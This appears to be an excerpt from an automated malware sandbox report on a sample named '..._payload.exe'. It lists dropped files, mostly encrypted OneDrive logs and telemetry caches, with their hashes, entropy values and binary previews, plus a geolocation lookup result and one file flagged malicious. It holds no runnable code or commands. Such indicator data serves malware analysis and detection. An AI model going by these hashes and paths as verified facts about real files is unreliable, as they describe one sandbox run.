                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_115740_6260-6264.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.5752881712807669
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:IvszYnQE06yoylCgbnWY0qfzqhc/uoKqs1ZwqCspH13oQ7yyaPUAp0o967owz:2Qm06fy8gThrqEutZcs/3ofyaPr0oq
                                                                                                      MD5:003F9FD53A08764BE1A8FBA646C16325
                                                                                                      SHA1:551DD1448C860E9D59114E49DC7F6ECE85740D2F
                                                                                                      SHA-256:A4067A3C7FEC38FF34C7E97A0CE5D5C83909B128AA55BA5C4675EC2D8121C555
                                                                                                      SHA-512:F80EB50ED7E1E5FB38FCF4452EBD107EF741739EE0F216C7DCC5D6E1C4EFAA042CAC239B84F5570327857BF8A4A4C6E1693DD93621316338AB2F5E8CE56B4EA6
                                                                                                      Malicious:false
                                                                                                      Preview:1.0./-......q...AQ..{O.g.."Ab...y8.G:Q5:......cd^.y..kXo..:........i...sIS..m...M/..VL...{X.diVW..(..HY.N&...JNIPW.*...T...1..d..... .`V.....t.2=._XS}.5.....m..,....,&.\G?.I...h.P.>D......Ki..i3.1.f.%.Eq......Y.M+..'.X.uX.3.ST)...G.{.]N....@...iYT.../r|....J.\..FY......!...S..h..'...d.+.c{...`7.G.,.C,.@_.@..q4z^h.;.|>-....^AR...]90.R.Y...b.....CF..V.F.k....=?_.}.Var.../db...I#..y....g+../s,.]ag...O.76....6.......T-...~....].....8...S. 4..&q...?..Y.9l...5...n..}...".Wb.iR{...l$...DJ.n`....-./PM..!....<..p...,P..R...1>.IbA<Y...8P?qc.]ZOJP..<].6c...(p....s......2.=..{q...3.\^...&-.$..z..8y..J..Q9._@...'..+G(.$2.v...Y...o.MF.yu............lnC$r..Q.Dp._..tg=.[....a......Q......q..j...#..Bk...vk.L...<K.4.....W.........63L.'.g<................'...!.#P..T.j.I....b".4%...."...w8..>5k.T<.mk...;.6..{.Q.H.:......TpP.f.-..l'p.v.'..y..W.....h...%\!%....M..J.N.&.>W4.......n...f...8...R.D-.........r.?.bM.[...'........P./...s.7f.....).2..6..>-N>.~.....S.".

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_121144_6972-6976.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):2.728655608251908
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:M8DFStkT8I8/+yy26bEPwvZxUO4J0rhun/UHz1TIL:5Dlf8/wblxxL4Wrm/2hTIL
                                                                                                      MD5:05371FC63870BB47188E1A1A968DF130
                                                                                                      SHA1:BAD2834838873134D7B36772204BBC6BD1D26BDE
                                                                                                      SHA-256:680E781BB618842190C44A9A3AD5FCC09891B5C1E707062BE08DD4835ED5BA7E
                                                                                                      SHA-512:494A808864F9290EEFBDB2132041FA5C0D82D07AD5AC86745350D185051D991A074FBB404DF45113CE59DAC65F896F47856488F1E4D4D77B1B0A133A7D7C637A
                                                                                                      Malicious:false
                                                                                                      Preview:1.0./.*z..'z...S..$!...8...M...9....1...6ag......Z|3.p.......Ng.Lx.Fg...9...i.[....ct.....uR.....UPq.%..qCf%...`.qf8...B.1.........I|..U.......l.^.)~3..t..bMc4r.........=.X$>..."0;..f..+.)...K2NYV..CM.T..5Z.?..8?.....$...).Ah.`........T.;.@.I..Z..?....<.).L<.e9..e....<.:.(...........Vz]Y..in.j..V.......?;.Y.\.c....C..U.}oH.LS.U.....H....+......1S.Z...=D..9V..uL.&v..w$C........9.....B.Fl...k..+oh..'..R..x.;.q...p...\..h..vp.M.tk...J.X.l.:^.<.....J.(..o.K..6d.P~&..gJ|.SF..!.(H.2i_.....x=knX\...1..F.3f.i8..=.....o.....a[G.\.m...cb....c..k .l!.$5..L..`.k....?..,......=W;.n..Z.Z.4.....[C.......w.O.h.5.V+..*pI...4<..rxkM....h..W......S`.w./.(.....6.*.9...*[.....k..70m$.....v .1....P....."........R..wuVB."..../..B%C.4.<r{..n..L!c...yW>...Axx.F.h f6......G..wd..!......4.L...0..o)]w."w..!.N..I.R_....<..x...{.....i.6.1...MTljd{.'...tB........."%.....j...[.B.[......<h..Lf..U...D?j....A....S..J.V.y....u"p.RT.`...+..<0..CtT`}.....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_121212_7980-7984.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):2.603221277465187
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:LeoT4qM5Mvzo0NH4VKWTw4MAugtWxk5dPeFrt+d3:tTRM2z7H4Z8KSkOz+d
                                                                                                      MD5:D7AB0033C34CF0CECA7C8BB5ADB4A182
                                                                                                      SHA1:D9D726803E0C76A1C793629BCFF538F1DCFA5070
                                                                                                      SHA-256:880D09D0120B2C0505765C223B70FD339538041C479C72180807BC15809B31F7
                                                                                                      SHA-512:9EDE65206818E79B2C69A9A30ED1A456DB354989A060F339BD07016BA0274718D85A9814941F1752428E8E12AC6C94241CE41E99A5D2ABAA55FBD5C60AC6B10B
                                                                                                      Malicious:false
                                                                                                      Preview:1.0./.m...<....Gp.X.hL.-..S.#..Zhzru...0..o....j.N.9.]j.~u.2..J.]...4A$>f.+C...6....8V::f.9....B<..+#..a..f....0...|..Fv...e&..p.@..uq...PnAiWL..%.{.....@l.9.jf.H..[......5ox9n.m.@Ks.z....S....6..#.t.3\.u...J.O...Y.+.j..V]!.;j..{.z....6.,.))u......&.k.d......:....i.d`..SfJ.L.{...Cy.....V.u.....Yj...(.../K..>..82}.F.ab.h...b.d#.5C.....X]....SdV......s.u9.jP..s....?.?....=... ..E..t.....V.........~v3./...<M...........>.\?E.].....-W....<....U....!r.UB..w...|.9....z.\.....1"J...2.].&.....^.5.<.....p..5..t..N..c.0..j .7).LX.E2.a........._.7.......<.LA.P.....V(.d_..f...P...lU..[o....g.&/..<q...L.<b..m.:...}s..I.-.!...h=u.....>;.i..........Y ..).*...?,[.V.I...G.C.........5...h!M....b&.N.a.....!..h.V...5..@.!...M....$.....!..-P.......w.).Hne..R.8%yw.M....*y.S.1.....}X.-.t.K.w.dKY!.H...;...*c!.t>..]w[.N.s*[s.^.2...../Nu_m.&.'....._5n|<...R.....23.R.s...*..+.\..@.&.`.&.?Ii...dC....+p.]..H~.|kwe9x.9.M!.z<M......j.P ..B..?r.xv.S......]%T).9......A

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-04_082907_5964-5996.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):2.3778373793049665
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:7RvHeiD+liKrDKxRugGb3DlCnOzezpvlX+pkvnc:JnD+liKm3esCCZBF
                                                                                                      MD5:198E652F6E0CD421E03C6E1C57826E44
                                                                                                      SHA1:169B0AA504662CAB8106CED0DE62D07AFE192EBE
                                                                                                      SHA-256:BFC7A69FBB3E4F4C6D668005263412FAD12826D436FF259F5CEBAB8823B0376B
                                                                                                      SHA-512:D3DFD2C9ACEC43D8C830A96F5C063DE14A51E76813322579F62EF8D63E7CCFA2CEF29D23F7D46AB57CC2C05DF82B2ED787E88ADEA12485794C79C6FCF76A7A54
                                                                                                      Malicious:false
                                                                                                      Preview:1.0./.C'...Ahz._e^.#..=.V]../.m..`....h.-..R.../...[.....Q..(..Y.-."..l.......a)..$O.._.....f..../F.2.X.,_a.w..&..z.CQ.......9....l%E.?..4.n..=..L..k{4.TX....4. >..8.W.........;v,f'..n..).(.+.%...#[..a..F.X.M...k..."....E.[d._.!.-...3;...eM..j..;.I.q..8...S=...E.......|..JA.@:Sv.}..#t.KA...1.o.f..1+..=..e.$.Y..H......!.q.P..A^.SF$.')...*$.&..>.mT.x0.l..6..@&...1..8=8...o..w...H.l.)...Fl....Az.{.r.J....>.f...c.F..[.`.&.+.....I../.ZzS-...y.W.*.......P..%.2%..1.s.R...9.../..j.k....y../.[R.).Hf.....'f8.z.k..i..c.4q.s.....?..>.CiH..y.. 8....*..V.w..8..a.j....B...`...#lZ((.E_..rk...b^R.....ZE..H....mP.q..8...`l.....n.l4. .Q.,3....F./....P-.$.Z'8.S.Dxm:..'.0...zl^Zi.K...g......N...+.[..e..i..t.V..I3.W.& .y..r.Nc....`H\.8.........g...K....!...a........#..-...P...Qz.+...ZA~.....W..(x..1).F.90.o...5..@..x...$.X.p.....E..Nz...t..^d...u.^!.D..q.R5.....{x..{X.r....H.:,..-....O.[M........S..a.{...'.H."K$q6Qi./ n....^.I.o.L.;....[..f....!....#....{A.S.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-04_083412_6972-6976.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):1.2017367937637466
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:yZlQCTpsPE30qjftiwlz/nIrNxx1RgUtx+4GIEHHH1KiH50XUsMTc9x9rxBU1Sy:yvQU/ftiwlzSlFEH1N5+MwnfU1S
                                                                                                      MD5:C55F30298690424240ACE5CC02D1994B
                                                                                                      SHA1:5184156012652B5198DF72FF312DBB1C7D307F43
                                                                                                      SHA-256:6BD01C1A90E821DA6EAC12EA90869B7A745196CDCCECD9C9929B84B9E3843955
                                                                                                      SHA-512:A7C3E3A3A438219784A2BD262A1E4A72072400122882DB89734B66EF2D20DDD119343E92939EE2AD1DE6B759FCEA3D091CF0792FB1B416F22BCAF7432099186E
                                                                                                      Malicious:false
                                                                                                      Preview:1.0./...Y."C..y.d9.g.qA[i=h....`}n.X..5...8.U-%.....r.k.>.....e.f~.....!..t.r.4[V...*.;.....FAf......}..._O`/..............x.,.o..../.\..`.Eo....[.u0.^..2...#n.h..m.....k.\..$[.5..}o...@o.r.V.Z.,.J.o.W...fQ..Fn.E6p.P)R.~....'...W~nn.....)q.f_.e..v.#$.z<x....'.;..(.LG5NH.E..j......../ax...&..B@.....k..p..,....W....j...6.Ch...I%..j...J.z....`.@2P..J..n)%.g.t.fj.E..<.CT.z...3.."...O;......1!O....C~=1.gE.1..7b..:..._.0.....D.\.,........C$.~E.l....e..2i.'....L.Wa.......`...&..%..%h.B..[5Q..|~...i.g..)mfo.....PV....o. .U....."z..pt.vsB@.(..gB?..j..CNl..L%.y..k.+..X..)....U.......H.&..m....^.rX.>.q.`g.LgM......C4...k.D.c.f.f.Y.].p....ht...<N.......+...i..G.%._[..X.s..]...H.....ks....y.o..2...n.DUM.._.zl..k..y.6.<.......(I.......(k.C#..Q....y)k.n...O.......YJ.!d.r..cM..............Gon..E..../.mw..t.......r../E.:...<u..v.I.m..l.....{...o....M..m\h....VG...Xb)...z.b.q .j......:hj^....6......<Y..!]`.0..hD...........knj..~.G......[.}..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-04_083652_5268-4940.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):1.7657740996427749
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:AFl36Y1ZDLcFS67AsjSp63IW67Aa7mLPlk3IxKLWuD3AK:AFw2ig67A+fYv7DulrIWy
                                                                                                      MD5:CF5154113F4DAE21AC278CD85C484982
                                                                                                      SHA1:B95B408968A3C8DC2FCA8E0F73CF626BD30B538C
                                                                                                      SHA-256:C22B2E02D6AC9D327A146329DA6AA3330F8971E7CACE809F15865BF925098738
                                                                                                      SHA-512:306371BAA411AFB3F393F7677BBF6FFA9AF452A12D09A3934A58E23FF0E0BC6DCCE4660EC2B8E8680BBE583C86EEFF31813E8D5586CC7D4AE0D42591BA36F2D5
                                                                                                      Malicious:false
                                                                                                      Preview:1.0./.........DG.Ih.WA.L.{V/X..k..6.a1*.f.}.%...]'.....J.L.._T.$]@..aM)Z\..........m....tW'. 2.....8.v..".S..&R.:*K.Wu....W)b2..w._..<...Qw.MM...2...dO..8......j.Z.s`...N...r.v..O.`O4...@...`.k.._!..[..2..oz+6..nh.=.*;.`A#...{...!V...@<+#..:.=....1...*U.h....Ng..m...x...5P%.....<.......X.....P...b#.3...... H.....<....M..Z..%C..@...$.S.'$......J.g..........u.,TX....J$.{h...u..........S5........(.sa..(=.P..!bp.x.e~.619..6.Y.s.....J...U;..nf.,..f..9#.G^i. sa....u....x.U......h....u......B.l...,...(e..:...3...$R.....:X..M..6e.it....St.M.W..'......SB.+.1...l|.K..U......3Vo......#V...J...kj...I...<7\....h.u.LX.z"E...XB0.#...q.+...)&..../bm.1.h8+.P'.._..5+MS.q.?e.....7..NKg8&.......+7....,Gp=m...h..!.U...E.7.At.w.5.%...b...T._.@bR.(...=Oo....g..y1V..P........I....J6.._....,E..`.-V..40."Z..Z..cl-..m.D.....X.-.KR*h.x`.i`>...M..s,9;d....PL..z..~.C...\l.......v^...6.%.....g.....!a....I/....rL...!...V.q.[./[....\..U..%0B}M..o..`...B..j.AD.C. ...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\machineTelemetryCache.otc.session

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):3.4261633913215443
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:XWkCeB+qSmZbcE1/KVRDklErAKN42fMjtnA4oN1honvIx1yPP3WyIlXaz1G5:XBCeB+q5Zj1Sr2KN42fM5GN1hjx0P5z
                                                                                                      MD5:F3A2674B8097FFC6E4C6CA4674112E2B
                                                                                                      SHA1:C9FCC55B687C73C1E4B57066D7125FC13F13CA63
                                                                                                      SHA-256:8A004930DAA236D10110E46B023427DE54EF3455177BEDE264FF6FDA2669FC5B
                                                                                                      SHA-512:71A288DFC596A19212AB192E615C743C73E63E95AE7053EB7E0E5401EF4C35166C3F8954689F05AB94B13B2BED96CE274F7B54113A4283AFB6AB98AF85E0D811
                                                                                                      Malicious:false
                                                                                                      Preview:SQLit."&p7m4k.0.%w.H.X...........QM......,.....Y.p..t..:.....=sq.h-.ad..1..o;-.L..bt<.....[.C.2]6.-.~.h.....ZS...|].-......~.6.zU.S...bo.Fj.z...JpH...gKwW.k..V.l.5....^.i".3W.....O.K.;...bu#..w.......$...S...b...6.....]...PQ...DJj.."QK........{]}[.....%..m.}.`]kA....eH..R.....c..fa....^..DC.......iFF.w..Q.O.!7......U.L.B.....0z..*.e.W..E:..]."...e.f...R....N.g...sU .j..Y..*.-..Ed? Z.....J$.%...k.3.q<.9......jf.g.....;....i....e.5.T......S7jV~..I.3DT...7wV.i+.,..!Z0..j.,H.;.....I;..([.5l...'.H;].B.".3...... ..VM..c.......N.GN.)..rf.~T.~..+...Fd]]..lp..k.,...T/..t.....W...=..%..o......... 3...5..H..... .&.).v.8w........x.f.ki..o.y....P....2.r....S~.`Y....ZhV>.S..3."....AV.gn....u..>4..0F......r....kS.4B.@..Nf...n.X..}.s...k...2r.S...*&..bN..7eg...X.p.....q...&...o......J....6.}J.Y.....U..e.o........J\fb...f.\9....7{.j..<I.!....Q...o&...^...<..uouH.#...M....2&. .n..ud.;...F8!...(.B.*1.5.m..Lb..g........../.A'.YW.~.)........>.(.g..jX..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\parentTelemetryCache.otc.session

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):3.4249173130845363
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:CvDf+5QUZjrQ2uI3XPQe/asn2azWgu+qkm1UdChHP310Uf46ladYrVTH5jF:ysxjU2z/Qefndu+qkGg+t0U4dYrVTH5
                                                                                                      MD5:D1D29ABC8E22954FEF2BCE473A6A253B
                                                                                                      SHA1:C78094CB355661DAC1A9372957CD934B0496E845
                                                                                                      SHA-256:577AFD2B1ABDA221C54C94054BA1856F096A627236D736142A9618673FEE4785
                                                                                                      SHA-512:20BC258CC21EC82057E7C1883DD1E7C3ED278981F9BE35B88186D1379C1F7A8C38377905754DCAFEEB3AFC647B76681CC6F86710C876FF121BBCAC4683B3C111
                                                                                                      Malicious:false
                                                                                                      Preview:SQLitM.@.S............V....O......VM?.....U..*....u.L.C..]...w.".L.....).....Y.r..n...J3.,.....E ...T.....&-.?I.$...........c..Xac5...z7.4.....E.%.G.3..S.....q"..\.H.'.5.7Q.+b..k.%;z{..=....|["6.-Z.........e#S....9;................ ...Um9G.j..(._.7q.N..R..A]...N'...._m....s.+uEz..)#.|..I.;s..#f.}...<.Jx....?.bb........../.vV(..P.2.6P....nI..-..Y.a.AW.O.m.k$.....=>...}..;... 0...WH..\.wd...y..0......}..M*Yu..........1.((.V.3.v...{...P[.K.0.&.6.7.G.D...&.o.0.G....X.Sb9h#........!E...#.v.Fk^ ......c..R...{i.&=........Y,..`...U. ..n...N.B RoG...E..1.4.?i..]._.oc.Z.......+.....p/6.M$..&..Up...s.9.n..A.9H...K.7........<..AT.K.(..o.6..t....}......i..A}.*..0....h..r.).3}ai.......a...,..w....,.u.=M.9.O...iu}.G`.A@.....p..i..]......j>.b..I2.1..`*.....!n.9k...m.....M7..b...=.&.....^oF4.......#^...\'.....6...k.K..G*..O.._....>.f&3C.h\..39"..J.&-:"(.s.......e...vN.#jh{...BP.C]../.A.:.....O...`..+`.bRF:.....Q.5.-..X....j....<l.y..rw.v=..).d..'`g.$\

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\userTelemetryCache.otc

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3211264
                                                                                                      Entropy (8bit):0.6633606448049281
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:b3n3Yf4XI2C5CvZ2hrfpU3WzJqeuc42r8whWwc:b4ftaw1U3WzUeuec
                                                                                                      MD5:C01F4BAE71C48DF12E859014A5887B43
                                                                                                      SHA1:5EA1836E05E633529EA4BAC245F107EE2DE09B34
                                                                                                      SHA-256:C060AA1271B0FB32888435BB144D40E17D1057521467706266FAC42D52D46928
                                                                                                      SHA-512:9B7CC2DCCF170146163F2328B16E7A5E20F7D29D767F994996A61444F2D9C9001AE195B5D089B26128E9E5965FD9308A9DA54F42F819435E3F309358D8471499
                                                                                                      Malicious:false
                                                                                                      Preview:1G.f.. .i...d...;.q.Y.;.d.q..?}..)EH.{....D.:...a..t.K..s...z[...y.w..|2Z..`..T..........G.v ~..~,....DS.%.. J..@...t;B........E...s*|..(ri..O....8bb.......}..=.....{I..y..-.]..W(....K}e.#k$...aO.o.L....WC=Do...y.....Cq.e<.t.x.#.'..`Z.f..+..N~.h.%...9...].._......F..&G..5..5.....(..R...l....4...c-.....C..D.../<....0...u<...V..g..4OR3...PC.,..z.=.....]T.....`.{.,3|0.\.i6...R./:I.d...a.*....U....2.)...:..~..-...r....K....+...C.y'._...1.1.??.T?7.2w1.'....-...ny3e..F...g.L'...4....L..=..b....f.C....=J^A~...|.e..S...3.e.d...5.#.,H~.....K.w.D6.9k..#.8.;.^O.X[H.a......%..3.@:.}....[.}..mJ...7..$.!...n..4.8...b.....;...B....c.......:G+..8F5...iZm....c5.tL4zP. ....b.W.C.o...'o.yB. .`...J......@..u.<v..,...P%..!.....`.=.Ti+..X.._.`...J..[>.......3. .l.?....#5..'....Ey..s.....Hj*meH}........I.P....(.....~#@3.!.@.H.).j....d.f...^M%.81..:,..hpe>tT.p...X...!..L.\s2s.{........r..Z.{.h...V 4K7.....Q:.......%..'P5.]......l.R.....n.N....:.....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\userTelemetryCache.otc.session

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):3.4279146985284976
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:hNrirJEFWsP7EhrQ/ldnf8fpDIEBIHRcJYlRdojg9m4qETQyk9r11WmuYIEuPmRz:OrJB09/zf8fYcJa8YAr1QmurPmR
                                                                                                      MD5:1B5DBB057D5458BECA30A606D11AF097
                                                                                                      SHA1:F92AA31B3E60742CBA2BD6A0010E498AAC8D7402
                                                                                                      SHA-256:78B1CDAC28C58CBC38F7F1818F74F1B40FA75102B044DF882873E5091F9B1F94
                                                                                                      SHA-512:414864C459E6FA8C88A2CC9F6869DFFC38CF468987198DA02A400CBCBEB4AFB151744F0E02A89BB387B866789774FB493B3730322932A7BC9BCF9B4F2A97C747
                                                                                                      Malicious:false
                                                                                                      Preview:SQLit.0..+k._MrI. .....b....uk.).1Q.!..9..E.."&...x.q$....e.v(T......_....G......&...`o...w.L........Bl.......a..-.DC....c....Sx%2w....D.$..AS.u:.6..3..b.5...%j+S.....6.7.n.P..(.p..m/F...A7q..d..'.....I.X H.Vw.m.k(K..).DJk6Du`..7V..H.~.L..B.r3Y.1.r4.4.w{.?......x...n..]..].M.s.t.&...}.N....A.......K..f..W..c.O../.w/...g#.N.OV.%'....N..e.Nd.Q.W.....4d.-.Cc...."~..A..M.x.A!...tr~.N..U.Kyo.W8..R:..9.#.wz.....}|].e8...c......h......'..H..=....|.... UN..Oj....i.-.....U..ZJv..t.Ke.s...[...6.wX........oT.V.D.?...7.Q..y..~.Rp..)9.b{.v..;t..Ee.\...fNa.....x:r....LQ.Ac..v.+H......L4..L...FX]d6.N_3.. x..^......<6....2o.........1....>...e.\p......w.%.`..x.6l.tt.*.~...4.Q..w%.w...$..+.D.l.TA..Lb..,.....G..1]{z......7.dN.!c.G...j.I..I.h..d......p....:.,....=h...5..wH..F...$x.n.m.+....c...H_....F.....LU|. ..3....6.q.`.)..'.te......i. ._.].,....*|\.e... ..8_.....h..'D....>?x....B|T"....a....T#..P{.].Mw.>]r.7'.~&...`.^.O3.Xo..*.i.c.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1353
                                                                                                      Entropy (8bit):7.827961579691975
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:YNHO0xzSotLH/sMNwBPomAlqnsPXAs9WIsCmVMS6UTdIQdmPYHm911v6bD:YRTz1/fNrpPXAUWTVMSxOQoPYHmhwD
                                                                                                      MD5:B11344C108BB4671B9D0FDFE63DF7AFF
                                                                                                      SHA1:C9941D861DE1DAEF178CD48EA1AE460D158DC021
                                                                                                      SHA-256:D91C46EE67656E07BB04189E89654AF7D16B836FC9CF328CF8C4360D3E81F7B8
                                                                                                      SHA-512:527867C4D3122805D1CB54A7EDD1B56E78E003E1DA5C0A2353B2A6DF8B1B3B416ECD31EBAF34ABA8A85F40D2AFFD89B32710F4F9AF78A1AD7ABD2DBFB338E310
                                                                                                      Malicious:false
                                                                                                      Preview:{"Rec'.Q...9...T.</]..hw.U#.E......\..s.1"W......OeU......O...b.%....8.... ....._5.x....5.e....x#.4J.....31P.0C.vr}...t~..u..........6.......f.2...6076o...,....=nv..u.+.."..4`0.{..........m.L.B*t..U.3..S....rDq..u.....zV....`O".v..(....5.....-Ua....@g...Z..di...A.~Fx..8.....X.qJ#n.J6..../......^..>:e.^/......qH...........6...p<..6.R..28*...E.ya.D.X.C.~.i/.Z..{I....*.S..]...>p.....a._.L.A..j........4.@...O..<'..U....D....._.~.....!...yO...@..!..~j..y.....t....Q..G..y.ky<..AJs..?..*.....5..S..R.$e.@...,C.7F.&.I.&.....4f......d..vs....;I.m.....t.....k5...t....>..`:b+..<{tr.....g.}B...I....vOt...VG....rn0.......D...e.. vZ......._W..R.).a.).....w...+..'...D2.>q..2.*...Dcf.j..i.z..O...........:..0..N..W.u.4;.G...H.i..6'.....L.....W..?.;.^m......{J./|..i..-.{.."...]f...Z7.Hl.i......(y.........?..t"2...G~!..\.I4..+).{<..30...L.-......cv..`^......)e0.xQ.A.[P..$.S".#R......'....z-. .s.g...;....y.......>.J..i.o...>jy>>.....(.n^_........q@

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\geo[1].json

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):454
                                                                                                      Entropy (8bit):4.647176594103703
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:YfwpHEx6uck3QVPDRbW3QVPaYIRWJH131S50dHkqm+k2J+1z:YCHDtk3QVPDRbW3QVPaYIgJV340hhm+a
                                                                                                      MD5:05DB4CF6C8D249F6C51187766BEE5469
                                                                                                      SHA1:A3513093AC0F6735CB4FD47BE3BCD351781EFD33
                                                                                                      SHA-256:3C267F076EE1845237E4EE50AEC25B928D2D652E7772A35FFB4F58F06924AB6C
                                                                                                      SHA-512:975127361C79A401672269FA1666770C41AFBFD2BD0E4A42DC9FCC59399E4D187862D5FE2383F57171F7C4B59CDA2705218924294005A6FF282ADEB456F019FD
                                                                                                      Malicious:false
                                                                                                      Preview:{"ip":"81.181.57.74","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Georgia","region_rus":"\u0414\u0436\u043e\u0440\u0434\u0436\u0438\u044f","region_ua":"\u0414\u0436\u043e\u0440\u0434\u0436\u0456\u044f","city":"Atlanta","city_rus":"\u0410\u0442\u043b\u0430\u043d\u0442\u0430","latitude":"33.748795","longitude":"-84.387543","zip_code":"30301","time_zone":"-05:00"}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Safety\edge\remote\script_300161259571223429446516194326035503227.rel.v2

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):83120
                                                                                                      Entropy (8bit):7.997909678891909
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:gcOhUc4vVJzosUilnDYS/3tE4L0YfNHJaHTJFMS/325v+pzkT6JvuaFzZ:uEsfiKiOFSFJMTPM8a+pQGxuaFzZ
                                                                                                      MD5:0FC0D9D6E2E2069C0E102BE271564856
                                                                                                      SHA1:DF85FBFB796C5C0AF3E2FE9E0CA72F6133E22539
                                                                                                      SHA-256:23361F6BEBFB82CCE0E7F60555EAEC502A615D65EF1CAFC9572933E06ED17F25
                                                                                                      SHA-512:00DEC88C55C3E75B76E874DEB55BA7366852B8F3CA557F30FDB1881B64C04F9C888D90B4F040978AECCF5DD1E7F5BD990714DBC98B1C029DB5D2B5F08F0E4F52
                                                                                                      Malicious:true
